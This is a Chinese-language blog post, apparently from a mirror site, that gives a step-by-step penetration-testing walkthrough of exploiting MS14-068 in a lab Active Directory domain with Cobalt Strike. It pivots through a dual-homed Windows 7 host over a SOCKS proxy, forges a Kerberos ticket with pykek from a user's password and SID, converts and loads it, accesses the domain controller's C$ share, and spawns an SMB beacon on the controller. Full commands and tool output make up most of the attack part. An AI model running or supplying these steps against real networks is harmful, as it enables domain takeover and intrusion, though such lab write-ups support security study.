zoukankan      html  css  js  c++  java
  • 通过 Cobalt Strike 利用 ms14-068

    拓扑图

    攻击者(kali) 位于 192.168.245.0/24 网段,域环境位于 192.168.31.0/24 网段。

    域中有一台 win7 有两张网卡,可以同时访问两个网段,以这台机器作为跳板机进入域环境。

    假设现在已经有一组域用户的账号密码

    user1  321!@#qwe
    

    获取用户的 sid

    whoami /user
    

    下面使用 pykek 生成票据,首先用 cs 开一个 socks 代理,然后用 proxychainspykek 带入内网

    proxychains python ms14-068.py -u user1@demo.ad -s S-1-5-21-2864277510-2444243591-773573486-1112 -d 192.168.1.100 -p '321!@#qwe'
    

    其中

    • demo.ad 为 域名
    • user1 为域中的一个用户
    • 321!@#qweuser1 的密码
    • user1sidS-1-5-21-2864277510-2444243591-773573486-1112
    • 192.168.1.100 为域控的 IP

    执行完毕后会在当前目录下生成一个 .ccache 的文件

    # proxychains python ms14-068.py -u user1@demo.ad -s S-1-5-21-2864277510-2444243591-773573486-1112 -d 192.168.1.100 -p '321!@#qwe'
    ProxyChains-3.1 (http://proxychains.sf.net)
      [+] Building AS-REQ for 192.168.1.100... Done!
      [+] Sending AS-REQ to 192.168.1.100...|S-chain|-<>-127.0.0.1:13491-<><>-192.168.1.100:88-<><>-OK
     Done!
      [+] Receiving AS-REP from 192.168.1.100... Done!
      [+] Parsing AS-REP from 192.168.1.100... Done!
      [+] Building TGS-REQ for 192.168.1.100... Done!
      [+] Sending TGS-REQ to 192.168.1.100...|S-chain|-<>-127.0.0.1:13491-<><>-192.168.1.100:88-<><>-OK
     Done!
      [+] Receiving TGS-REP from 192.168.1.100... Done!
      [+] Parsing TGS-REP from 192.168.1.100... Done!
      [+] Creating ccache file 'TGT_user1@demo.ad.ccache'... Done!
    

    然后使用 KrbCredExport.ccachekirbi 格式。

    # python KrbCredExport/KrbCredExport.py TGT_user1@demo.ad.ccache user1.ticket
    CCache File Found, Converting to kirbi
    

    转换后的文件保存在 user1.ticket , 然后可以用 cs 加载这个文件。

    下面先看看没有加载前的权限。

    首先获取域控的机器名。

    shell net group "domain controllers" /domain
    

    所以 域控的主机名为

    WIN-OA43324ZI95.demo.ad
    

    然后 net use 一下 ,发现是不能访问的。

    net use \WIN-OA43324ZI95.demo.adc$
    

    然后加载 user1.ticket 文件, 再次执行发现可以访问域控资源,已经得到域控的权限。

    注: 一定要用 域控的主机全名 而不要用 ip 。

    然后使用当前对话对域控进行 psh 攻击 ,使用 smbbeacon

    过一会就可以看到域控连上来了。

    参考

    https://blog.cptjesus.com/posts/ms14068
    https://zhuanlan.zhihu.com/p/26171460
    内网渗透中mimikatz的使用(https://www.jianshu.com/p/a3ddd7502c09)
    
    
  • 相关阅读:
    编程题#2: 魔兽世界之二:装备
    程序设计实习MOOC / 继承和派生——编程作业 第五周程序填空题1
    【转】C++动态创建二维数组,二维数组指针
    HDU-2571命运
    HDU-1203 I NEED A OFFER!
    HDU-1003 Max Sum
    HDU2196-Computer
    HDU-1520 Anniversary party
    ChineseHelper(获取汉字字符串的首拼)
    车牌号正则表达式(新能源车牌)
  • 原文地址:https://www.cnblogs.com/hac425/p/9985802.html
Copyright © 2011-2022 走看看